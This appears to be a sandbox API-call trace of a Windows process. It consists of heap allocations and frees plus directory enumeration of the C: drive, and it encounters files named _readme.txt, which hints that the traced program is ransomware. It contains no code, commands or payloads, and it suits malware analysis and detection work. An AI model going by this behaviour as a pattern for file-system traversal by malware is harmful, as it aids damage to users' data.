1 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x16c) returned 0x3408dc8 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x678008 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x677fe0 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7bd8 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x65dba8 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x65dae0 [0228.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1958 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x677d88 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c65a0 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.429] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x56231c60, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0xa1602bc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa1602bc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7b90 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c68 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7b90 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c20 | out: hHeap=0x620000) returned 1 [0228.429] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4635d30, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0xf4635d30, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf4635d30, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SystemID", cAlternateFileName="")) returned 1 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5f10 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.430] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.430] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x214) returned 0x346fa10 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x677d88 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7c20 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79078 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b790a0 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1958 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b790c8 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b790f0 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x33d7b90 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79118 [0228.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x3b79140 [0228.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18b0 | out: hHeap=0x620000) returned 1 [0228.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x678008 | out: hHeap=0x620000) returned 1 [0228.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x677fe0 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7bd8 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65dba8 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x65dae0 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c65a0 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33d7c68 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5f10 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd540 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3408dc8 | out: hHeap=0x620000) returned 1 [0228.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd540 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c6618 | out: hHeap=0x620000) returned 1 [0228.431] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xf51f69d0, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0xf51f69d0, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf521cb30, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0228.431] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x12020, ftCreationTime.dwLowDateTime=0xf51f69d0, ftCreationTime.dwHighDateTime=0x1d5d833, ftLastAccessTime.dwLowDateTime=0xf51f69d0, ftLastAccessTime.dwHighDateTime=0x1d5d833, ftLastWriteTime.dwLowDateTime=0xf521cb30, ftLastWriteTime.dwHighDateTime=0x1d5d833, nFileSizeHigh=0x0, nFileSizeLow=0x457, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0228.431] FindClose (in: hFindFile=0x33f03c8 | out: hFindFile=0x33f03c8) returned 1 [0228.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c19c8 [0228.431] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.432] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.432] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.433] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.433] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18e8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c18e8 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c6618 [0228.434] PeekMessageW (in: lpMsg=0x39afb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39afb74) returned 0 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.434] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.434] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.435] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.435] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.436] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.436] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33c5ee8 [0228.437] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.437] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5ee8 | out: hHeap=0x620000) returned 1 [0228.437] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.437] 